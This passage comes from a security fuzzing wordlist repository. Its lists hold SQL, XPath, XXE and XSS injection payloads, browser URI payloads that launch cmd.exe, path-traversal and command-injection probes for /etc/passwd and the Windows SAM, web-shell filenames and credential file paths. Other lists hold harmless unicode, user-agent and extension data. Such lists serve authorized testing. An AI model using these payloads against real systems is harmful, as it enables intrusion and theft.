0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 -------------------------------------------------------------------------------- /wordlist/attack/string-expansion/shell-expansion.txt: -------------------------------------------------------------------------------- 1 | $HOME 2 | $ENV{'HOME'} 3 | %d 4 | %s 5 | {0} 6 | %*.*s 7 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/corrupted.txt: -------------------------------------------------------------------------------- 1 | Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ 2 | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ 3 | ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ 4 | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ 5 | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ 6 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/emoji.txt: -------------------------------------------------------------------------------- 1 | 2 | 😍 3 | 👩🏽 4 | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 5 | 🐵 🙈 🙉 🙊 6 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 7 | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 8 | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 9 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 10 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/japanese-emoticon.txt: -------------------------------------------------------------------------------- 1 | ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ 2 | (。◕ ∀ ◕。) 3 | `ィ(´∀`∩ 4 | __ロ(,_,*) 5 | ・( ̄∀ ̄)・:*: 6 | ゚・✿ヾ╲(。◕‿◕。)╱✿・゚ 7 | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ 8 | (╯°□°)╯︵ ┻━┻) 9 | (ノಥ益ಥ)ノ ┻━┻ 10 | ┬─┬ノ( º _ ºノ) 11 | ( ͡° ͜ʖ ͡°) 12 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/naughty-unicode.txt: -------------------------------------------------------------------------------- 1 | Ω≈ç√∫˜µ≤≥÷ 2 | åß∂ƒ©˙∆˚¬…æ 3 | œ∑´®†¥¨ˆøπ“‘ 4 | ¡™£¢∞§¶•ªº–≠ 5 | ¸˛Ç◊ı˜Â¯˘¿ 6 | ÅÍÎÏ˝ÓÔÒÚÆ☃ 7 | Œ„´‰ˇÁ¨ˆØ∏”’ 8 | `⁄€‹›fifl‡°·‚—± 9 | ⅛⅜⅝⅞ 10 | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя 11 | ٠١٢٣٤٥٦٧٨٩ 12 | 13 | 14 | 15 | 16 | 17 | ⁰⁴⁵ 18 | ₀₁₂ 19 | ⁰⁴⁵₀₁₂ 20 | ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ 21 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/regionalindicators.txt: -------------------------------------------------------------------------------- 1 | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 2 | 🇺🇸🇷🇺🇸🇦🇫🇦🇲 3 | 🇺🇸🇷🇺🇸🇦 4 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/right-to-left.txt: -------------------------------------------------------------------------------- 1 | ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. 2 | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ 3 | הָיְתָהtestالصفحات التّحول 4 | ﷽ 5 | ﷺ 6 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/specialchars.txt: -------------------------------------------------------------------------------- 1 | , 2 | . 3 | / 4 | ; 5 | ' 6 | [ 7 | ] 8 | \ 9 | - 10 | = 11 | < 12 | > 13 | ? 14 | : 15 | " 16 | { 17 | } 18 | | 19 | _ 20 | + 21 | ! 22 | @ 23 | # 24 | $ 25 | % 26 | ^ 27 | & 28 | * 29 | ( 30 | ) 31 | ` 32 | ~ 33 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/two-byte-chars.txt: -------------------------------------------------------------------------------- 1 | 田中さんにあげて下さい 2 | パーティーへ行かないか 3 | 和製漢語 4 | 部落格 5 | 사회과학원 어학연구소 6 | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하 7 | 社會科學院語學研究所 8 | 울란바토르 9 | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏 10 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/upsidedown.txt: -------------------------------------------------------------------------------- 1 | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ 2 | 00˙Ɩ$- 3 | -------------------------------------------------------------------------------- /wordlist/attack/xml/xml-attacks.txt: -------------------------------------------------------------------------------- 1 | - 2 | ' or ''=' 3 | ' or '1'='1 4 | "]>&xxe;" 5 | "]>&xxe;" 6 | "]>&xxe;" 7 | "]>&xxe;" 8 | "" 9 | "SCRIPT]]>alert('XSS');/SCRIPT]]>" 10 | "XSS" 11 | "XSS" 12 | "cript:alert('XSS')"">" 13 | "]]>" 14 | "" 15 | $ 16 | % 17 | 'XoiZR 18 | <% Tnn96 %> 19 | <%= Tnn96 %> 20 | <? Tnn96 ?> 21 | <?Tnn96 ?> 22 | <Tnn96> 23 | "XoiZR 24 | (Tnn96) 25 | * 26 | */* 27 | / 28 | // 29 | //* 30 | : 31 | ; 32 | @ 33 | @* 34 | [Tnn96] 35 | ]> 36 | {{= Tnn96}} 37 | {{Tnn96}} 38 | {= Tnn96} 39 | {Tnn96} 40 | + 41 | SCRIPT]]>alert('XSS');/SCRIPT]]> 42 | var n=0;while(true){n++;}]]> 43 | 44 | 45 | ]>&xee; 46 | ]>&xee; 47 | ]>&xee; 48 | ]>&xee; 49 | 50 | SCRIPT]]>alert('gotcha');/SCRIPT]]> 51 | ','')); phpinfo(); exit;/* 52 | 0 53 | 0.00005 54 | 0.1 55 | 0.9 56 | 1 57 | -1 58 | 1.7976931348623157e+308 59 | 5e-10 60 | 5e-324 61 | count(/child::node()) 62 | false 63 | null 64 | true 65 | x' or 1=1 or 'x'='y 66 | x' or name()='username' or 'x'='y 67 | -------------------------------------------------------------------------------- /wordlist/attack/xpath/xpath-injection.txt: -------------------------------------------------------------------------------- 1 | ' or '1'='1 2 | ' or ''=' 3 | x' or 1=1 or 'x'='y 4 | / 5 | // 6 | //* 7 | */* 8 | @* 9 | count(/child::node()) 10 | x' or name()='username' or 'x'='y 11 | ' and count(/*)=1 and '1'='1 12 | ' and count(/@*)=1 and '1'='1 13 | ' and count(/comment())=1 and '1'='1 -------------------------------------------------------------------------------- /wordlist/attack/xss/all-encodings-of-lt.txt: -------------------------------------------------------------------------------- 1 | < 2 | %3C 3 | < 4 | < 5 | < 6 | < 7 | < 8 | < 9 | < 10 | < 11 | < 12 | < 13 | < 14 | < 15 | < 16 | < 17 | < 18 | < 19 | < 20 | < 21 | < 22 | < 23 | < 24 | < 25 | < 26 | < 27 | < 28 | < 29 | < 30 | < 31 | < 32 | < 33 | < 34 | < 35 | < 36 | < 37 | < 38 | < 39 | < 40 | < 41 | < 42 | < 43 | < 44 | < 45 | < 46 | < 47 | < 48 | < 49 | < 50 | < 51 | < 52 | < 53 | < 54 | < 55 | < 56 | < 57 | < 58 | < 59 | < 60 | < 61 | < 62 | < 63 | < 64 | < 65 | < 66 | < 67 | \x3c 68 | \x3C 69 | \u003c 70 | \u003C 71 | -------------------------------------------------------------------------------- /wordlist/attack/xss/default-javascript-event-attributes.txt: -------------------------------------------------------------------------------- 1 | onAbort 2 | onBlur 3 | onChange 4 | onClick 5 | onDblClick 6 | onDragDrop 7 | onError 8 | onFocus 9 | onKeyDown 10 | onKeyPress 11 | onKeyUp 12 | onLoad 13 | onMouseDown 14 | onMouseMove 15 | onMouseOut 16 | onMouseOver 17 | onMouseUp 18 | onMove 19 | onReset 20 | onResize 21 | onSelect 22 | onSubmit 23 | -------------------------------------------------------------------------------- /wordlist/attack/xss/test.xxe: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /wordlist/attack/xss/xss-uri.txt: -------------------------------------------------------------------------------- 1 | aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" 2 | firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" 3 | navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 4 | res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 5 | firefoxurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 6 | navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 7 | -------------------------------------------------------------------------------- /wordlist/discovery/UserAgent/UserAgentListCommon.txt: -------------------------------------------------------------------------------- 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 2 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) 3 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) 4 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) 5 | Opera/9.20 (Windows NT 6.0; U; en) 6 | Opera/9.00 (Windows NT 5.1; U; en) 7 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50 8 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1 9 | Googlebot/2.1 ( http://www.googlebot.com/bot.html) 10 | Googlebot-Image/1.0 ( http://www.googlebot.com/bot.html) 11 | Mozilla/2.0 (compatible; Ask Jeeves) 12 | msnbot-Products/1.0 (+http://search.msn.com/msnbot.htm) 13 | Mozilla/5.0 (iPad; U; CPU OS 3_2_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B500 Safari/531.21.10 14 | Mozilla/5.0 (iPad; CPU OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25 15 | Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko 16 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko 17 | Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 18 | Mozilla/5.0 (Linux; U; Android 2.2.1; en-ca; LG-P505R Build/FRG83) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 19 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 20 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) 21 | Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 -------------------------------------------------------------------------------- /wordlist/discovery/dns/CcTLD.txt: -------------------------------------------------------------------------------- 1 | ac 2 | ad 3 | ae 4 | af 5 | ag 6 | ai 7 | al 8 | am 9 | an 10 | ao 11 | aq 12 | ar 13 | as 14 | at 15 | au 16 | aw 17 | ax 18 | az 19 | ba 20 | bb 21 | bd 22 | be 23 | bf 24 | bg 25 | bh 26 | bi 27 | bj 28 | bl 29 | bm 30 | bn 31 | bo 32 | bq 33 | br 34 | bs 35 | bt 36 | bv 37 | bw 38 | by 39 | bz 40 | ca 41 | cc 42 | cd 43 | cf 44 | cg 45 | ch 46 | ci 47 | ck 48 | cl 49 | cm 50 | cn 51 | co 52 | cr 53 | cu 54 | cv 55 | cw 56 | cx 57 | cy 58 | cz 59 | dd 60 | de 61 | dj 62 | dk 63 | dm 64 | do 65 | dz 66 | ec 67 | ee 68 | eg 69 | eh 70 | er 71 | es 72 | et 73 | eu 74 | fi 75 | fj 76 | fk 77 | fm 78 | fo 79 | fr 80 | ga 81 | gb 82 | gd 83 | ge 84 | gf 85 | gg 86 | gh 87 | gi 88 | gl 89 | gm 90 | gn 91 | gp 92 | gq 93 | gr 94 | gs 95 | gt 96 | gu 97 | gw 98 | gy 99 | hk 100 | hm 101 | hn 102 | hr 103 | ht 104 | hu 105 | id 106 | ie 107 | il 108 | im 109 | in 110 | io 111 | iq 112 | ir 113 | is 114 | it 115 | je 116 | jm 117 | jo 118 | jp 119 | ke 120 | kg 121 | kh 122 | ki 123 | km 124 | kn 125 | kp 126 | kr 127 | kw 128 | ky 129 | kz 130 | la 131 | lb 132 | lc 133 | li 134 | lk 135 | lr 136 | ls 137 | lt 138 | lu 139 | lv 140 | ly 141 | ma 142 | mc 143 | md 144 | me 145 | mf 146 | mg 147 | mh 148 | mk 149 | ml 150 | mm 151 | mn 152 | mo 153 | mp 154 | mq 155 | mr 156 | ms 157 | mt 158 | mu 159 | mv 160 | mw 161 | mx 162 | my 163 | mz 164 | na 165 | nc 166 | ne 167 | nf 168 | ng 169 | ni 170 | nl 171 | no 172 | np 173 | nr 174 | nu 175 | nz 176 | om 177 | pa 178 | pe 179 | pf 180 | pg 181 | ph 182 | pk 183 | pl 184 | pm 185 | pn 186 | pr 187 | ps 188 | pt 189 | pw 190 | py 191 | qa 192 | re 193 | ro 194 | rs 195 | ru 196 | rw 197 | sa 198 | sb 199 | sc 200 | sd 201 | se 202 | sg 203 | sh 204 | si 205 | sj 206 | sk 207 | sl 208 | sm 209 | sn 210 | so 211 | sr 212 | ss 213 | st 214 | su 215 | sv 216 | sx 217 | sy 218 | sz 219 | tc 220 | td 221 | tf 222 | tg 223 | th 224 | tj 225 | tk 226 | tl 227 | tm 228 | tn 229 | to 230 | tp 231 | tr 232 | tt 233 | tv 234 | tw 235 | tz 236 | ua 237 | ug 238 | uk 239 | um 240 | us 241 | uy 242 | uz 243 | va 244 | vc 245 | ve 246 | vg 247 | vi 248 | vn 249 | vu 250 | wf 251 | ws 252 | ye 253 | yt 254 | yu 255 | za 256 | zm 257 | zw 258 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/Randomfiles.txt: -------------------------------------------------------------------------------- 1 | /accounts.txt 2 | /culeadora.txt 3 | /data.txt 4 | /database.txt 5 | /grabbed.html 6 | /info.txt 7 | /l0gs.txt 8 | /log.txt 9 | /logins.txt 10 | /logs.txt 11 | /members.txt 12 | /pass.txt 13 | /passes.txt 14 | /password.html 15 | /password.txt 16 | /passwords.html 17 | /passwords.txt 18 | /pazz.txt 19 | /pazzezs.txt 20 | /pw.txt 21 | /pws.txt 22 | /technico.txt 23 | /usernames.txt 24 | /users.txt 25 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/UnixDotfiles.txt: -------------------------------------------------------------------------------- 1 | /.DS_Store 2 | /.FBCIndex 3 | /.access 4 | /.addressbook 5 | /.bash_history 6 | /.bashrc 7 | /.cobalt 8 | /.cobalt/alert/service.cgi?service= 9 | /.cobalt/alert/service.cgi?service= 10 | /.cobalt/sysManage/../admin/.htaccess 11 | /.fhp 12 | /.forward 13 | /.history 14 | /.htaccess 15 | /.htaccess.old 16 | /.htaccess.save 17 | /.htaccess~ 18 | /.htpasswd 19 | /.lynx_cookies 20 | /.mysql_history 21 | /.nsconfig 22 | /.nsf/../winnt/win.ini 23 | /.passwd 24 | /.perf 25 | /.pinerc 26 | /.plan 27 | /.proclog 28 | /.procmailrc 29 | /.profile 30 | /.psql_history 31 | /.rhosts 32 | /.sh_history 33 | /.ssh 34 | /.ssh/authorized_keys 35 | /.ssh/known_hosts 36 | /.www_acl 37 | /.wwwacl 38 | /.access 39 | /.cobalt 40 | /.cobalt/alert/service.cgi?service= 41 | /.cobalt/alert/service.cgi?service= 42 | /.fhp 43 | /.htaccess 44 | /.htaccess.old 45 | /.htaccess.save 46 | /.htaccess~ 47 | /.htpasswd 48 | /.nsconfig 49 | /.passwd 50 | /.www_acl 51 | /.wwwacl 52 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/backdoors/ASP_CommonBackdoors.txt: -------------------------------------------------------------------------------- 1 | 3fexe.asp 2 | ASpy.asp 3 | EFSO.asp 4 | RemExp.asp 5 | aspxSH.asp 6 | aspxshell.aspx 7 | aspydrv.asp 8 | cmd.asp 9 | cmd.aspx 10 | cmdexec.aspx 11 | elmaliseker.asp 12 | filesystembrowser.aspx 13 | fileupload.aspx 14 | ntdaddy.asp 15 | spexec.aspx 16 | sql.aspx 17 | tool.asp 18 | tool.aspx 19 | toolaspshell.asp 20 | up.asp 21 | up.aspx 22 | zehir.asp 23 | zehir.aspx 24 | zehir4.asp 25 | zehir4.aspx 26 | cmd-asp-5.1.asp 27 | cmdasp.asp 28 | cmdasp.aspx 29 | list.asp 30 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/cgi/CGI_HTTP_POST.txt: -------------------------------------------------------------------------------- 1 | post-query 2 | Config1.htm 3 | My_eGallery/public/displayCategory.php 4 | servlet/custMsg?guestName= 19 | /athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' 20 | /mkilog.exe 21 | /mkplog.exe 22 | /MsmMask.exe?mask=/junk334 23 | /MsmMask.exe?mask=/junk334 24 | /MsmMask.exe?mask=/junk334 25 | /MsmMask.exe?mask=/junk334 26 | /MsmMask.exe?mask=/junk334 27 | /perl.exe?-v 28 | /perl.exe 29 | /ppdscgi.exe 30 | /c32web.exe/ChangeAdminPassword 31 | /windmail.exe 32 | /dbmlparser.exe 33 | /cgimail.exe 34 | /minimal.exe 35 | /rguest.exe 36 | /visitor.exe 37 | /webbbs.exe 38 | /wguest.exe 39 | //_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15 40 | /cfgwiz.exe 41 | /Cgitest.exe 42 | /mailform.exe 43 | /post16.exe 44 | /imagemap.exe 45 | /htimage.exe/path/filename?2,2 46 | /htimage.exe 47 | /Webnews.exe 48 | /texis.exe/junk 49 | /apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/ 50 | /sensepost.exe?/c+dir 51 | /testcgi.exe 52 | /testcgi.exe? 53 | /ion-p.exe?page=c:\winnt\repair\sam 54 | /../../../../../../../../../../WINNT/system32/ipconfig.exe 55 | /NUL/../../../../../../../../../WINNT/system32/ipconfig.exe 56 | /PRN/../../../../../../../../../WINNT/system32/ipconfig.exe 57 | /c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf 58 | /foxweb.dll 59 | /wconsole.dll 60 | /shtml.dll 61 | /scripts/slxweb.dll/getfile?type=Library&file=[invalid 62 | /filename] 63 | /rightfax/fuwww.dll/? 64 | /WINDMAIL.EXE?%20-n%20c:\boot.ini% 65 | /WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\ 66 | /GW5/GWWEB.EXE 67 | /GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA 68 | /GW5/GWWEB.EXE?HELP=bad-request 69 | /GWWEB.EXE?HELP=bad-request 70 | /echo.bat 71 | /echo.bat?&dir+c:\\ 72 | /hello.bat?&dir+c:\\ 73 | /input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 74 | /input2.bat?|dir 75 | /input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 76 | /test-cgi.bat 77 | /test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 78 | /tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\, 79 | /_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X 80 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/cms/joomla_themes.txt: -------------------------------------------------------------------------------- 1 | templates/abc/ 2 | templates/atomic/ 3 | templates/b59-tpl8/ 4 | templates/beez/ 5 | templates/carbon_07/ 6 | templates/crub/ 7 | templates/dm_arrow_red/ 8 | templates/gk_eshoptrix_2/ 9 | templates/gk_gomuproject/ 10 | templates/gk_icki_sports/ 11 | templates/gk_musictop/ 12 | templates/ja_purity/ 13 | templates/ja_rochea/ 14 | templates/ja_teline_ii/ 15 | templates/joomlaport_metro/ 16 | templates/js_relevant/ 17 | templates/mynxx_j15/ 18 | templates/planets/ 19 | templates/planetsv2/ 20 | templates/rhuk_milkyway/ 21 | templates/rt_hivemind_j15/ 22 | templates/rt_mediamogul_essentials_j15/ 23 | templates/rt_nexus_j15/ 24 | templates/siteground99/ 25 | templates/siteground-j15-14/ 26 | templates/siteground-j15-68/ 27 | templates/siteground-j15-86/ 28 | templates/system/ 29 | templates/yoo_phoenix/ 30 | templates/yoo_waybeyond/ 31 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/cms/wp_common_theme_files.txt: -------------------------------------------------------------------------------- 1 | 404.php 2 | archive.php 3 | archives.php 4 | author.php 5 | category.php 6 | comments.php 7 | content.php 8 | data.php 9 | footer.php 10 | functions.php 11 | header.php 12 | home.php 13 | image.php 14 | images 15 | images/content-bg.jpg 16 | images/footer.jpg 17 | images/footer.png 18 | images/functions.php 19 | images/gravatar.png 20 | images/header-bg.jpg 21 | images/header.png 22 | images/index.php 23 | images/main_bg.png 24 | images/rss.png 25 | images/Thumbs.db 26 | index.php 27 | js 28 | js/html5.js 29 | languages 30 | license.txt 31 | License.txt 32 | links.php 33 | page.php 34 | print.css 35 | readme.txt 36 | reset.css 37 | rtl.css 38 | RTL.css 39 | searchform.php 40 | search.php 41 | sidebar.php 42 | single.php 43 | style.css 44 | tag.php 45 | tags.php 46 | 47 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/cms/wp_themes.readme: -------------------------------------------------------------------------------- 1 | Themes usually live in a directory called wp-content. 2 | 3 | Determine how the server handles directories which aren't present vs files which aren't present in a path that exists in order to tell which themes are installed. 4 | 5 | use wp_common_theme_files.fuzz.php inside the identified theme dirs 6 | 7 | Often you can tell the current theme by viewing source. 8 | 9 | Theme list generated last on Sept 6 2013 10 | 11 | from: http://themes.svn.wordpress.org 12 | 13 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/CommonWebExtensions.txt: -------------------------------------------------------------------------------- 1 | .asp 2 | .aspx 3 | .bat 4 | .c 5 | .cfm 6 | .cgi 7 | .com 8 | .dll 9 | .exe 10 | .htm 11 | .html 12 | .inc 13 | .jhtml 14 | .jsa 15 | .jsp 16 | .log 17 | .mdb 18 | .nsf 19 | .php 20 | .php2 21 | .php3 22 | .php4 23 | .php5 24 | .php6 25 | .php7 26 | .phtml 27 | .phps 28 | .pl 29 | .reg 30 | .sh 31 | .shtml 32 | .sql 33 | .txt 34 | .xml 35 | .swf 36 | .pcap 37 | .001 38 | .002 39 | .1 40 | .2 41 | .7z 42 | .Z 43 | .back 44 | .backup 45 | .bak 46 | .bakup 47 | .bas 48 | .bz2 49 | .c 50 | .conf 51 | .copia 52 | .core 53 | .cpp 54 | .dat 55 | .db 56 | .default 57 | .dll 58 | .doc 59 | .ini 60 | .jar 61 | .java 62 | .old 63 | .orig 64 | .pas 65 | .rar 66 | .sav 67 | .saved 68 | .source 69 | .src 70 | .stackdump 71 | .tar 72 | .tar.gz 73 | .temp 74 | .test 75 | .tgz 76 | .tmp 77 | .txt 78 | .war 79 | .zip 80 | ~ 81 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Backup.txt: -------------------------------------------------------------------------------- 1 | backup 2 | bck 3 | old 4 | save 5 | bak 6 | sav 7 | ~ 8 | copy 9 | old 10 | orig 11 | tmp 12 | txt 13 | back 14 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Compressed.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 000 3 | 7z 4 | a00 5 | a01 6 | a02 7 | ace 8 | ain 9 | alz 10 | apz 11 | ar 12 | arc 13 | arh 14 | ari 15 | arj 16 | ark 17 | axx 18 | b64 19 | ba 20 | bh 21 | boo 22 | bz 23 | bz2 24 | bzip 25 | bzip2 26 | c00 27 | c01 28 | c02 29 | car 30 | cb7 31 | cbr 32 | cbt 33 | cbz 34 | cp9 35 | cpgz 36 